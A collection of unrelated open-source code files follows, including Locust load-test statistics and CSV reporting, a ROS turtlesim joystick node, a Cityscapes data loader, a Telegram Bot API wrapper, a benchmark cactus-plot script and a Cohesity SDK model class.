setattr(obj, key, data[key])
return obj
def get_stripped_report(self):
"""
Return the serialized version of this StatsEntry, and then clear the current stats.
"""
report = self.serialize()
self.reset()
return report
def to_string(self, current=True):
"""
Return the stats as a string suitable for console output. If current is True, it'll show
the RPS and failure rate for the last 10 seconds. If it's false, it'll show the total stats
for the whole run.
"""
if current:
rps = self.current_rps
fail_per_sec = self.current_fail_per_sec
else:
rps = self.total_rps
fail_per_sec = self.total_fail_per_sec
return (" %-" + str(STATS_NAME_WIDTH) + "s %7d %12s | %7d %7d %7d %7d | %7.2f %7.2f") % (
(self.method and self.method + " " or "") + self.name,
self.num_requests,
"%d(%.2f%%)" % (self.num_failures, self.fail_ratio * 100),
self.avg_response_time,
self.min_response_time or 0,
self.max_response_time,
self.median_response_time or 0,
rps or 0,
fail_per_sec or 0,
)
def __str__(self):
return self.to_string(current=True)
def get_response_time_percentile(self, percent):
"""
Get the response time that a certain number of percent of the requests
finished within.
Percent specified in range: 0.0 - 1.0
"""
return calculate_response_time_percentile(self.response_times, self.num_requests, percent)
def get_current_response_time_percentile(self, percent):
"""
Calculate the *current* response time for a certain percentile. We use a sliding
window of (approximately) the last 10 seconds (specified by CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW)
when calculating this.
"""
if not self.use_response_times_cache:
raise ValueError(
"StatsEntry.use_response_times_cache must be set to True if we should be able to calculate the _current_ response time percentile"
)
# First, we want to determine which of the cached response_times dicts we should
# use to get response_times for approximately 10 seconds ago.
t = int(time.time())
# Since we can't be sure that the cache contains an entry for every second.
# We'll construct a list of timestamps which we consider acceptable keys to be used
# when trying to fetch the cached response_times. We construct this list in such a way
# that it's ordered by preference by starting to add t-10, then t-11, t-9, t-12, t-8,
# and so on
acceptable_timestamps = []
acceptable_timestamps.append(t - CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW)
for i in range(1, 9):
acceptable_timestamps.append(t - CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW - i)
acceptable_timestamps.append(t - CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + i)
cached = None
for ts in acceptable_timestamps:
if ts in self.response_times_cache:
cached = self.response_times_cache[ts]
break
if cached:
# If we found an acceptable cached response times, we'll calculate a new response
# times dict of the last 10 seconds (approximately) by diffing it with the current
# total response times. Then we'll use that to calculate a response time percentile
# for that timeframe
return calculate_response_time_percentile(
diff_response_time_dicts(self.response_times, cached.response_times),
self.num_requests - cached.num_requests,
percent,
)
# if time was not in response times cache window
return None
def percentile(self):
if not self.num_requests:
raise ValueError("Can't calculate percentile on url with no successful requests")
tpl = f" %-{str(STATS_TYPE_WIDTH)}s %-{str(STATS_NAME_WIDTH)}s %8d {' '.join(['%6d'] * len(PERCENTILES_TO_REPORT))}"
return tpl % (
(self.method, self.name)
+ tuple([self.get_response_time_percentile(p) for p in PERCENTILES_TO_REPORT])
+ (self.num_requests,)
)
def _cache_response_times(self, t):
self.response_times_cache[t] = CachedResponseTimes(
response_times=copy(self.response_times),
num_requests=self.num_requests,
)
# We'll use a cache size of CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + 10 since - in the extreme case -
# we might still use response times (from the cache) for t-CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW-10
# to calculate the current response time percentile, if we're missing cached values for the subsequent
# 20 seconds
cache_size = CURRENT_RESPONSE_TIME_PERCENTILE_WINDOW + 10
if len(self.response_times_cache) > cache_size:
# only keep the latest 20 response_times dicts
for i in range(len(self.response_times_cache) - cache_size):
self.response_times_cache.popitem(last=False)
class StatsError:
def __init__(self, method, name, error, occurrences=0):
self.method = method
self.name = name
self.error = error
self.occurrences = occurrences
@classmethod
def parse_error(cls, error):
string_error = repr(error)
target = "object at 0x"
target_index = string_error.find(target)
if target_index < 0:
return string_error
start = target_index + len(target) - 2
end = string_error.find(">", start)
if end < 0:
return string_error
hex_address = string_error[start:end]
return string_error.replace(hex_address, "0x....")
@classmethod
def create_key(cls, method, name, error):
key = "%s.%s.%r" % (method, name, StatsError.parse_error(error))
return hashlib.md5(key.encode("utf-8")).hexdigest()
def occurred(self):
self.occurrences += 1
def to_name(self):
error = self.error
if isinstance(error, CatchResponseError):
# standalone
unwrapped_error = error.args[0]
if isinstance(error, str) and error.startswith("CatchResponseError("):
# distributed
length = len("CatchResponseError(")
unwrapped_error = error[length:-1]
else:
# standalone, unwrapped exception
unwrapped_error = repr(error)
return "%s %s: %s" % (self.method, self.name, unwrapped_error)
def to_dict(self):
return {
"method": self.method,
"name": self.name,
"error": StatsError.parse_error(self.error),
"occurrences": self.occurrences,
}
@classmethod
def from_dict(cls, data):
return cls(data["method"], data["name"], data["error"], data["occurrences"])
def avg(values):
return sum(values, 0.0) / max(len(values), 1)
def median_from_dict(total, count):
"""
total is the number of requests made
count is a dict {response_time: count}
"""
pos = (total - 1) / 2
for k in sorted(count.keys()):
if pos < count[k]:
return k
pos -= count[k]
def setup_distributed_stats_event_listeners(events, stats):
def on_report_to_master(client_id, data):
data["stats"] = stats.serialize_stats()
data["stats_total"] = stats.total.get_stripped_report()
data["errors"] = stats.serialize_errors()
stats.errors = {}
def on_worker_report(client_id, data):
for stats_data in data["stats"]:
entry = StatsEntry.unserialize(stats_data)
request_key = (entry.name, entry.method)
if request_key not in stats.entries:
stats.entries[request_key] = StatsEntry(stats, entry.name, entry.method, use_response_times_cache=True)
stats.entries[request_key].extend(entry)
for error_key, error in data["errors"].items():
if error_key not in stats.errors:
stats.errors[error_key] = StatsError.from_dict(error)
else:
stats.errors[error_key].occurrences += error["occurrences"]
stats.total.extend(StatsEntry.unserialize(data["stats_total"]))
events.report_to_master.add_listener(on_report_to_master)
events.worker_report.add_listener(on_worker_report)
def print_stats(stats, current=True):
console_logger.info(
(" %-" + str(STATS_NAME_WIDTH) + "s %7s %12s | %7s %7s %7s %7s | %7s %7s")
% ("Name", "# reqs", "# fails", "Avg", "Min", "Max", "Median", "req/s", "failures/s")
)
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
for key in sorted(stats.entries.keys()):
r = stats.entries[key]
console_logger.info(r.to_string(current=current))
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
console_logger.info(stats.total.to_string(current=current))
console_logger.info("")
def print_percentile_stats(stats):
console_logger.info("Response time percentiles (approximated)")
headers = ("Type", "Name") + tuple(get_readable_percentiles(PERCENTILES_TO_REPORT)) + ("# reqs",)
console_logger.info(
(
f" %-{str(STATS_TYPE_WIDTH)}s %-{str(STATS_NAME_WIDTH)}s %8s "
f"{' '.join(['%6s'] * len(PERCENTILES_TO_REPORT))}"
)
% headers
)
separator = (
f'{"-" * STATS_TYPE_WIDTH}|{"-" * STATS_NAME_WIDTH}|{"-" * 9}|{("-" * 6 + "|") * len(PERCENTILES_TO_REPORT)}'
)
console_logger.info(separator)
for key in sorted(stats.entries.keys()):
r = stats.entries[key]
if r.response_times:
console_logger.info(r.percentile())
console_logger.info(separator)
if stats.total.response_times:
console_logger.info(stats.total.percentile())
console_logger.info("")
def print_error_report(stats):
if not len(stats.errors):
return
console_logger.info("Error report")
console_logger.info(" %-18s %-100s" % ("# occurrences", "Error"))
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
for error in stats.errors.values():
console_logger.info(" %-18i %-100s" % (error.occurrences, error.to_name()))
console_logger.info("-" * (80 + STATS_NAME_WIDTH))
console_logger.info("")
def stats_printer(stats):
def stats_printer_func():
while True:
print_stats(stats)
gevent.sleep(CONSOLE_STATS_INTERVAL_SEC)
return stats_printer_func
def sort_stats(stats):
return [stats[key] for key in sorted(stats.keys())]
def stats_history(runner):
"""Save current stats info to history for charts of report."""
while True:
stats = runner.stats
if not stats.total.use_response_times_cache:
break
if runner.state != "stopped":
r = {
"time": datetime.datetime.utcnow().strftime("%H:%M:%S"),
"current_rps": stats.total.current_rps or 0,
"current_fail_per_sec": stats.total.current_fail_per_sec or 0,
"response_time_percentile_95": stats.total.get_current_response_time_percentile(0.95) or 0,
"response_time_percentile_50": stats.total.get_current_response_time_percentile(0.5) or 0,
"user_count": runner.user_count or 0,
}
stats.history.append(r)
gevent.sleep(HISTORY_STATS_INTERVAL_SEC)
class StatsCSV:
"""Write statistics to csv_writer stream."""
def __init__(self, environment, percentiles_to_report):
super().__init__()
self.environment = environment
self.percentiles_to_report = percentiles_to_report
self.percentiles_na = ["N/A"] * len(self.percentiles_to_report)
self.requests_csv_columns = [
"Type",
"Name",
"Request Count",
"Failure Count",
"Median Response Time",
"Average Response Time",
"Min Response Time",
"Max Response Time",
"Average Content Size",
"Requests/s",
"Failures/s",
] + get_readable_percentiles(self.percentiles_to_report)
self.failures_columns = [
"Method",
"Name",
"Error",
"Occurrences",
]
self.exceptions_columns = [
"Count",
"Message",
"Traceback",
"Nodes",
]
def _percentile_fields(self, stats_entry, use_current=False):
if not stats_entry.num_requests:
return self.percentiles_na
elif use_current:
return [int(stats_entry.get_current_response_time_percentile(x) or 0) for x in self.percentiles_to_report]
else:
return [int(stats_entry.get_response_time_percentile(x) or 0) for x in self.percentiles_to_report]
def requests_csv(self, csv_writer):
"""Write requests csv with header and data rows."""
csv_writer.writerow(self.requests_csv_columns)
self._requests_data_rows(csv_writer)
def _requests_data_rows(self, csv_writer):
"""Write requests csv data row, excluding header."""
stats = self.environment.stats
for stats_entry in chain(sort_stats(stats.entries), [stats.total]):
csv_writer.writerow(
chain(
[
stats_entry.method,
stats_entry.name,
stats_entry.num_requests,
stats_entry.num_failures,
stats_entry.median_response_time,
stats_entry.avg_response_time,
stats_entry.min_response_time or 0,
stats_entry.max_response_time,
stats_entry.avg_content_length,
stats_entry.total_rps,
stats_entry.total_fail_per_sec,
],
self._percentile_fields(stats_entry),
)
)
def failures_csv(self, csv_writer):
csv_writer.writerow(self.failures_columns)
self._failures_data_rows(csv_writer)
def _failures_data_rows(self, csv_writer):
for stats_error in sort_stats(self.environment.stats.errors):
csv_writer.writerow(
[
stats_error.method,
stats_error.name,
stats_error.error,
stats_error.occurrences,
]
)
def exceptions_csv(self, csv_writer):
csv_writer.writerow(self.exceptions_columns)
self._exceptions_data_rows(csv_writer)
def _exceptions_data_rows(self, csv_writer):
for exc in self.environment.runner.exceptions.values():
csv_writer.writerow([exc["count"], exc["msg"], exc["traceback"], ", ".join(exc["nodes"])])
class StatsCSVFileWriter(StatsCSV):
"""Write statistics to to CSV files"""
def __init__(self, environment, percentiles_to_report, base_filepath, full_history=False):
super().__init__(environment, percentiles_to_report)
self.base_filepath = base_filepath
self.full_history = full_history
self.requests_csv_filehandle = open(self.base_filepath + "_stats.csv", "w")
self.requests_csv_writer = csv.writer(self.requests_csv_filehandle)
self.stats_history_csv_filehandle = open(self.stats_history_file_name(), "w")
self.stats_history_csv_writer = csv.writer(self.stats_history_csv_filehandle)
self.failures_csv_filehandle = open(self.base_filepath + "_failures.csv", "w")
self.failures_csv_writer = csv.writer(self.failures_csv_filehandle)
self.failures_csv_data_start = 0
self.exceptions_csv_filehandle = open(self.base_filepath + "_exceptions.csv", "w")
self.exceptions_csv_writer = csv.writer(self.exceptions_csv_filehandle)
self.exceptions_csv_data_start = 0
self.stats_history_csv_columns = [
"Timestamp",
"User Count",
"Type",
"Name",
"Requests/s",
"Failures/s",
*get_readable_percentiles(self.percentiles_to_report),
"Total Request Count",
"Total Failure Count",
"Total Median Response Time",
"Total Average Response Time",
"Total Min Response Time",
"Total Max Response Time",
"Total Average Content Size",
]
def __call__(self):
self.stats_writer()
def stats_writer(self):
"""Writes all the csv files for the locust run."""
# Write header row for all files and save position for non-append files
self.requests_csv_writer.writerow(self.requests_csv_columns)
requests_csv_data_start = self.requests_csv_filehandle.tell()
self.stats_history_csv_writer.writerow(self.stats_history_csv_columns)
self.failures_csv_writer.writerow(self.failures_columns)
self.failures_csv_data_start = self.failures_csv_filehandle.tell()
self.exceptions_csv_writer.writerow(self.exceptions_columns)
self.exceptions_csv_data_start = self.exceptions_csv_filehandle.tell()
# Continuously write date rows for all files
last_flush_time = 0
while True:
now = time.time()
self.requests_csv_filehandle.seek(requests_csv_data_start)
self._requests_data_rows(self.requests_csv_writer)
self.requests_csv_filehandle.truncate()
self._stats_history_data_rows(self.stats_history_csv_writer, now)
self.failures_csv_filehandle.seek(self.failures_csv_data_start)
self._failures_data_rows(self.failures_csv_writer)
self.failures_csv_filehandle.truncate()
self.exceptions_csv_filehandle.seek((self.exceptions_csv_data_start))
self._exceptions_data_rows(self.exceptions_csv_writer)
self.exceptions_csv_filehandle.truncate()
if now - last_flush_time > CSV_STATS_FLUSH_INTERVAL_SEC:
self.requests_flush()
self.stats_history_flush()
self.failures_flush()
self.exceptions_flush()
last_flush_time = now
gevent.sleep(CSV_STATS_INTERVAL_SEC)
def _stats_history_data_rows(self, csv_writer, now):
"""
Write CSV rows with the *current* stats. By default only includes the
Aggregated stats entry, but if self.full_history is set to True, a row for each entry will
will be included.
Note that this method differs from the other methods as it appends time-stamped data to the file, whereas the other methods overwrites the data.
"""
stats = self.environment.stats
timestamp = int(now)
stats_entries = []
if self.full_history:
stats_entries = sort_stats(stats.entries)
for stats_entry in chain(stats_entries, [stats.total]):
csv_writer.writerow(
chain(
(
timestamp,
self.environment.runner.user_count,
stats_entry.method or "",
stats_entry.name,
f"{stats_entry.current_rps:2f}",
f"{stats_entry.current_fail_per_sec:2f}",
),
self._percentile_fields(stats_entry, use_current=self.full_history),
(
stats_entry.num_requests,
stats_entry.num_failures,
stats_entry.median_response_time,
stats_entry.avg_response_time,
stats_entry.min_response_time or 0,
stats_entry.max_response_time,
stats_entry.avg_content_length,
),
)
)
def requests_flush(self):
self.requests_csv_filehandle.flush()
def stats_history_flush(self):
self.stats_history_csv_filehandle.flush()
def failures_flush(self):
self.failures_csv_filehandle.flush()
def exceptions_flush(self):
self.exceptions_csv_filehandle.flush()
def close_files(self):
self.requests_csv_filehandle.close()
self.stats_history_csv_filehandle.close()
self.failures_csv_filehandle.close()
self.exceptions_csv_filehandle.close()
def stats_history_file_name(self):
return self.base_filepath + "_stats_history.csv"
|
the-stack_106_16888
|
#!/usr/bin/env python
"""
Node converts joystick inputs into commands for Turtlesim
"""
import rospy
from geometry_msgs.msg import Twist
from sensor_msgs.msg import Joy
from move_circle import move_circle
def joy_listener():
# start node
rospy.init_node("turtlesim_joy", anonymous=True)
# subscribe to joystick messages on topic "joy"
rospy.Subscriber("joy", Joy, tj_callback, queue_size=1)
# keep node alive until stopped
rospy.spin()
# called when joy message is received
def tj_callback(data):
# start publisher of cmd_vel to control Turtlesim
pub = rospy.Publisher("turtle1/cmd_vel", Twist, queue_size=1)
# Create Twist message & add linear x and angular z from left joystick
twist = Twist()
twist.linear.x = data.axes[1]
twist.angular.z = data.axes[0]
# record values to log file and screen
rospy.loginfo("twist.linear: %f ; angular %f", twist.linear.x, twist.angular.z)
# process joystick buttons
if data.buttons[0] == 1: # green button on xbox controller
move_circle()
# publish cmd_vel move command to Turtlesim
pub.publish(twist)
if __name__ == '__main__':
try:
joy_listener()
except rospy.ROSInterruptException:
pass
|
the-stack_106_16889
|
import torch
import torchvision
from PIL import Image
from matplotlib import pyplot as plt
import random
model = torchvision.models.__dict__['vgg19']()
print(model)
img = torch.rand(1,3,256,256)
out = model.features(img)
print(out.size())
import torchvision.transforms as trans
crop = trans.RandomCrop(224)
img = torch.rand(1,3,256,256)
out = crop(img)
print(out.size())
def divide_patches(img, row, col):
patche_size_w = int(img.size[0] / col)
patche_size_h = int(img.size[1] / row)
patches = []
for cnt_i, i in enumerate(range(0, img.size[1], patche_size_h)):
if cnt_i == row:
break
for cnt_j, j in enumerate(range(0, img.size[0], patche_size_w)):
if cnt_j == col:
break
box = (j, i, j+patche_size_w, i+patche_size_h)
patches.append(img.crop(box))
return patches
def display_images(
images: [Image],
row=3, col=3, width=10, height=4, max_images=15,
label_wrap_length=50, label_font_size=8):
if not images:
print("No images to display.")
return
if len(images) > max_images:
print(f"Showing {max_images} images of {len(images)}:")
images=images[0:max_images]
height = max(height, int(len(images)/col) * height)
plt.figure(figsize=(width, height))
for i, image in enumerate(images):
plt.subplot(row, col, i + 1)
plt.imshow(image)
plt.show()
image = Image.open("/mnt/hdd02/shibuya_scramble/image_000294.jpg").convert("RGB")
p = divide_patches(image, 2, 3)
print(len(p))
display_images(p, row=2, col=3)
def create_pos_pair(patches):
idx = random.randint(0, len(patches)-1)
img1 = patches[idx]
img2 = patches[idx]
label = 1
return img1, img2, label
def create_neg_pair(patches):
idx = random.sample(range(0, len(patches)-1), k=2)
img1 = patches[idx[0]]
img2 = patches[idx[1]]
label = 0
return img1, img2, label
def get_img(img):
patches = divide_patches(img, 3, 2)
if random.random() > 0.5:
img1, img2, label = create_pos_pair(patches)
else:
img1, img2, label = create_neg_pair(patches)
return img1, img2, label
res = []
for i in range(10):
img1, img2, label = get_img(image)
flag = False
if img1 == img2:
flag = True
res.append([flag, label])
print(res)
|
the-stack_106_16890
|
#!/usr/bin/env python
import re
import sys
import logging
import argparse
from unicon.mock.mock_device import MockDevice, MockDeviceTcpWrapper
logger = logging.getLogger(__name__)
class MockDeviceSpitfire(MockDevice):
def __init__(self, *args, **kwargs):
super().__init__(*args, device_os='iosxr', **kwargs)
def enable(self, transport, cmd):
if re.match('clock set', cmd):
return True
def spitfire_confirm_switchover(self, transport, cmd):
if cmd == "":
self.command_handler(transport, cmd)
if len(self.transport_ports) > 1:
self.state_change_switchover(transport, 'spitfire_console_standby', 'spitfire_login')
return True
class MockDeviceTcpWrapperSpitfire(MockDeviceTcpWrapper):
def __init__(self, *args, **kwargs):
super().__init__(*args, device_os='iosxr', **kwargs)
if 'port' in kwargs:
kwargs.pop('port')
self.mockdevice = MockDeviceSpitfire(*args, **kwargs)
def main(args=None):
logging.basicConfig(stream=sys.stderr, level=logging.INFO,
format="%(asctime)s [%(levelname)8s]: %(message)s")
if not args:
parser = argparse.ArgumentParser()
parser.add_argument('--state', help='initial state')
parser.add_argument('--ha', action='store_true', help='HA mode')
parser.add_argument('--hostname', help='Device hostname (default: Router')
parser.add_argument('-d', action='store_true', help='Debug')
args = parser.parse_args()
if args.d:
logging.getLogger().setLevel(logging.DEBUG)
if args.state:
state = args.state
else:
if args.ha:
state = 'spitfire_login,spitfire_console_standby'
else:
state = 'spitfire_login'
if args.hostname:
hostname = args.hostname
else:
hostname = 'Router'
if args.ha:
md = MockDeviceTcpWrapperSpitfire(hostname=hostname, state=state)
md.run()
else:
md = MockDeviceSpitfire(hostname=hostname, state=state)
md.run()
if __name__ == "__main__":
main()
|
the-stack_106_16891
|
import os
import os.path
import numpy as np
import copy
import torch
from .base import BaseDataset
from . import augmentation as psp_trsform
from torch.utils.data import DataLoader
from torch.utils.data.distributed import DistributedSampler
import random
class city_dset(BaseDataset):
def __init__(self, data_root, data_list, trs_form, seed, n_sup, split='val'):
super(city_dset, self).__init__(data_list)
self.data_root = data_root
self.transform = trs_form
random.seed(seed)
if(len(self.list_sample)>=n_sup) and split=='train':
self.list_sample_new = random.sample(self.list_sample,n_sup)
else:
self.list_sample_new = self.list_sample
def __getitem__(self, index):
# load image and its label
image_path = os.path.join(self.data_root, self.list_sample_new[index][0])
label_path = os.path.join(self.data_root, self.list_sample_new[index][1])
image = self.img_loader(image_path, 'RGB')
label = self.img_loader(label_path, 'L')
image, label = self.transform(image, label)
return image[0], label[0, 0].long()
def __len__(self):
return len(self.list_sample_new)
def build_transfrom(cfg):
trs_form = []
mean, std, ignore_label = cfg['mean'], cfg['std'], cfg['ignore_label']
trs_form.append(psp_trsform.ToTensor())
trs_form.append(psp_trsform.Normalize(mean=mean, std=std))
if cfg.get('resize', False):
trs_form.append(psp_trsform.Resize(cfg['resize']))
if cfg.get('rand_resize', False):
trs_form.append(psp_trsform.RandResize(cfg['rand_resize']))
if cfg.get('rand_rotation', False):
rand_rotation = cfg['rand_rotation']
trs_form.append(psp_trsform.RandRotate(rand_rotation, ignore_label=ignore_label))
if cfg.get('GaussianBlur', False) and cfg['GaussianBlur']:
trs_form.append(psp_trsform.RandomGaussianBlur())
if cfg.get('flip', False) and cfg.get('flip'):
trs_form.append(psp_trsform.RandomHorizontalFlip())
if cfg.get('crop', False):
crop_size, crop_type = cfg['crop']['size'], cfg['crop']['type']
trs_form.append(psp_trsform.Crop(crop_size, crop_type=crop_type, ignore_label=ignore_label))
return psp_trsform.Compose(trs_form)
def build_cityloader(split, all_cfg, seed=0):
cfg_dset = all_cfg['dataset']
cfg_trainer = all_cfg['trainer']
cfg = copy.deepcopy(cfg_dset)
cfg.update(cfg.get(split, {}))
workers = cfg.get('workers', 2)
batch_size = cfg.get('batch_size', 1)
n_sup = cfg.get('n_sup',2975)
# build transform
trs_form = build_transfrom(cfg)
dset = city_dset(cfg['data_root'], cfg['data_list'], trs_form, seed, n_sup, split)
# build sampler
sample = DistributedSampler(dset)
loader = DataLoader(dset, batch_size=batch_size, num_workers=workers,
sampler=sample, shuffle=False, pin_memory=False)
return loader
|
the-stack_106_16893
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Esteban J. Garcia Gabancho.
# Copyright (C) 2020 Mojib Wali.
#
# invenio-shibboleth is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Module tests."""
from __future__ import absolute_import, print_function
from flask import Flask
from invenio_shibboleth import Invenioshibboleth
def test_version():
"""Test version import."""
from invenio_shibboleth import __version__
assert __version__
def test_init():
"""Test extension initialization."""
app = Flask("testapp")
ext = Invenioshibboleth(app)
assert "invenio-shibboleth" in app.extensions
app = Flask("testapp")
ext = Invenioshibboleth()
assert "invenio-shibboleth" not in app.extensions
ext.init_app(app)
assert "invenio-shibboleth" in app.extensions
|
the-stack_106_16894
|
import pathlib
import json
import pytest
scriptDir = pathlib.Path(__file__).parent.resolve()
test_data_dir = str(scriptDir) + "/test_data/"
class Helpers:
@staticmethod
def getQueryForTest(filename):
global test_data_dir
f1 = open(test_data_dir + filename + '/query.sql', "r")
# read files
query = f1.read()
# close files
f1.close()
return query
@staticmethod
def getTableLineageResultForTest(filename):
global test_data_dir
f1 = open(test_data_dir + filename + '/tableLineage.json', "r")
# read files
query = f1.read()
# close files
f1.close()
return json.loads(query)
@staticmethod
def getParsedResultForTest(filename):
global test_data_dir
f1 = open(test_data_dir + filename + '/parsed.json', "r")
# read files
query = f1.read()
# close files
f1.close()
return json.loads(query)
@pytest.fixture
def helpers():
return Helpers
|
the-stack_106_16895
|
#!/usr/bin/python
# created: Marc 2020
# author: Marc Torrent
# modified:
import numpy as np
import pandas as pd
pi = np.pi
def power_spectral_density(x, time_step, freq_range=None, N_pieces=None):
"""
returns the *single sided* power spectral density of the time trace x which is sampled at intervals time_step
gives the same result as scipy.scipy.signal where N_piece = len(x) / nperseg and window = 'boxcar'
Args:
x (array): timetrace
time_step (float): sampling interval of x
freq_range (array or tuple): frequency range in the form [f_min, f_max] to return only the spectrum within this range
N_pieces: if not None should be integer and the timetrace will be chopped into N_pieces parts, the PSD calculated for each and the avrg PSD is returned
Returns:
"""
if N_pieces is not None:
assert type(N_pieces) is int
F, P = [], []
for x_sub in np.reshape(x[0:int(len(x) / N_pieces) * N_pieces], (N_pieces, int(len(x) / N_pieces))):
F_sub, P_sub = power_spectral_density(x_sub, time_step, freq_range=freq_range, N_pieces=None)
F.append(F_sub)
P.append(P_sub)
F = np.mean(F, axis=0)
P = np.mean(P, axis=0)
else:
N = len(x)
P = 2 * np.abs(np.fft.rfft(x)) ** 2 / N * time_step
F = np.fft.rfftfreq(len(x), time_step)
if freq_range is not None:
brange = np.all([F >= freq_range[0], F <= freq_range[1]], axis=0)
P = P[brange]
F = F[brange]
return F, P
|
the-stack_106_16900
|
import json
import requests
class TelegramApi(object):
"""
"""
URL = "https://api.telegram.org/bot"
def __init__(self, token):
self.token = token
def get_me(self, save=False):
"""
:param save:
:return:
"""
_url = self.URL + self.token + "/getMe"
req = requests.get(_url)
if save:
save_json("telegram_get_me.json", req.json())
return req.json()
def get_updates(self, save=False):
"""
:param save:
:return:
"""
_url = self.URL + self.token + "/getUpdates"
req = requests.get(_url)
if save:
save_json("telegram_get_updates.json", req.json())
return req.json()
def send_message(self, chat_id, text, mode_html=False, save=False):
"""
:param chat_id:
:param text:
:param mode_html:
:param save:
:return:
"""
_url = self.URL + self.token + "/sendMessage"
if mode_html:
data = {"chat_id": chat_id, "text": text, "parse_mode": "HTML"}
else:
data = {"chat_id": chat_id, "text": text}
req = requests.post(_url, json=data)
if save:
save_json("telegram_send_message.json", req.json())
return req.json()
def set_webhook(self, url, save=False):
"""
:param url:
:param save:
:return:
"""
_url = self.URL + self.token + "/setWebhook"
data = {"url": url}
req = requests.post(_url, json=data)
if save:
save_json("telegram_set_webhook.json", req.json())
return req.json()
def delete_webhook(self, save=False):
"""
:param save:
:return:
"""
_url = self.URL + self.token + "/deleteWebhook"
req = requests.get(_url)
if save:
save_json("telegram_delete_webhook.json", req.json())
return req.json()
def get_webhook_info(self, save=False):
"""
:param save:
:return:
"""
_url = self.URL + self.token + "/getWebhookInfo"
req = requests.get(_url)
if save:
save_json("telegram_get_webhook_info.json", req.json())
return req.json()
def save_json(file, json_data):
"""
:param file:
:param json_data:
:return:
"""
with open(file, "w", encoding="utf8") as f:
json.dump(json_data, f, indent=2, ensure_ascii=False)
|
the-stack_106_16903
|
import argparse
import csv
import re
import random
from cycler import cycler
from pathlib import Path
from matplotlib.cm import get_cmap
from matplotlib.lines import Line2D
import matplotlib.pyplot as plt
def cactus_plot(args):
colors = list(get_cmap('tab20').colors)
colors = colors[:-1:2] + colors[1::2]
# random.shuffle(colors)
markers = list(Line2D.filled_markers) + ['x', '.', '+']
num = min(len(colors), len(markers))
# cc = cycler(marker=markers[:num]) + cycler(color=colors[:num])
cc = cycler(color=colors)
plt.rc('axes', prop_cycle=cc)
# mks = iter(['x-', 'o-', 's-', 'v-', '<-', '>-', 'P-', 'd-', '.-', '*-', 'D-'])
i_markers = iter([d + '-' for d in markers])
plt.figure()
if args.baseline:
for fin in sorted(Path(args.baseline_dir).rglob('*.csv')):
if fin.stem == 'final':
continue
px, py = [0], [0]
rtime = []
name = fin.stem
with open(fin) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
sat = row['verdict']
if sat != 'UNKNOWN':
rtime.append(float(row['time']))
rtime.sort()
for i, j in enumerate(rtime):
if j > args.eval_time:
break
px.append(i)
py.append(j)
plt.plot(px, py, label=name, alpha=0.8, markersize=5)
regex = re.compile(args.re)
for fin in sorted(Path(args.input_dir).rglob('*.csv')):
if not regex.match(fin.stem):
continue
if fin.stem == 'final':
continue
px, py = [0], [0]
rtime = []
name = fin.stem
with open(fin) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
sat = row['verdict']
if sat != 'UNKNOWN':
rtime.append(float(row['time']))
rtime.sort()
for i, j in enumerate(rtime):
if j > args.eval_time:
break
px.append(i)
py.append(j)
plt.plot(px, py, i_markers.__next__(), label=name if args.label else None, alpha=0.8, markersize=5)
plt.xlim(0)
plt.ylim(0, args.eval_time)
plt.legend()
plt.xlabel('Number of solved instances')
plt.ylabel('Time (s)')
plt.savefig(Path(args.input_dir) / 'fig.pdf')
def gen_csv4all(args):
# data_point,verdict,time
csv_final = Path(args.input_dir) / 'final.csv'
data_points = []
runtimes = []
fields = ['data_point']
regex = re.compile(args.re)
flag = True
for csvfile in sorted(Path(args.input_dir).rglob('*.csv')):
if not regex.match(csvfile.stem):
continue
if csv_final.stem == 'final':
continue
fields.append(str(csvfile.stem))
with open(csvfile) as cur:
reader = csv.DictReader(cur)
runtime = []
for row in reader:
if flag:
data_points.append(row['data_point'])
if row['verdict'] != 'UNKNOWN':
runtime.append(float(row['time']))
else:
runtime.append(args.eval_time)
runtimes.append(runtime)
if flag:
flag = False
row_datas = [data_points] + runtimes
col_datas = zip(*row_datas)
with open(csv_final, 'w') as fout:
writer = csv.writer(fout)
writer.writerow(fields)
for col_data in col_datas:
writer.writerow(col_data)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-I', '--input_dir', required=True, type=str)
parser.add_argument('-T', '--eval_time', default=5000, type=float)
parser.add_argument('-R', '--re', default='.*', type=str)
parser.add_argument('-B', '--baseline', action='store_true')
parser.add_argument('-D', '--baseline_dir', default='result/baseline', type=str)
parser.add_argument('-L', '--label', action='store_true')
args = parser.parse_args()
cactus_plot(args)
gen_csv4all(args)
if __name__ == "__main__":
main()
|
the-stack_106_16904
|
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
class UdaRestoreObjectParams(object):
"""Implementation of the 'UdaRestoreObjectParams' model.
Attributes:
new_object_name (string): The new name of the object, if it is going to
be renamed.
overwrite (bool): Whether to overwrite or keep the object if the
object being recovered already exists in the destination.
restore_time_secs (long|int): The point-in-time to which object needs
to be restored. This allows for the granular recovery of Uda
objects. If this is not set, the Uda object will be restored to
full/incremental snapshot.
"""
# Create a mapping from Model property names to API property names
_names = {
"new_object_name":'newObjectName',
"overwrite":'overwrite',
"restore_time_secs":'restoreTimeSecs'
}
def __init__(self,
new_object_name=None,
overwrite=None,
restore_time_secs=None):
"""Constructor for the UdaRestoreObjectParams class"""
# Initialize members of the class
self.new_object_name = new_object_name
self.overwrite = overwrite
self.restore_time_secs = restore_time_secs
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
new_object_name = dictionary.get('newObjectName')
overwrite = dictionary.get('overwrite')
restore_time_secs = dictionary.get('restoreTimeSecs')
# Return an object of this model
return cls(new_object_name,
overwrite,
restore_time_secs)
|
the-stack_106_16905
|
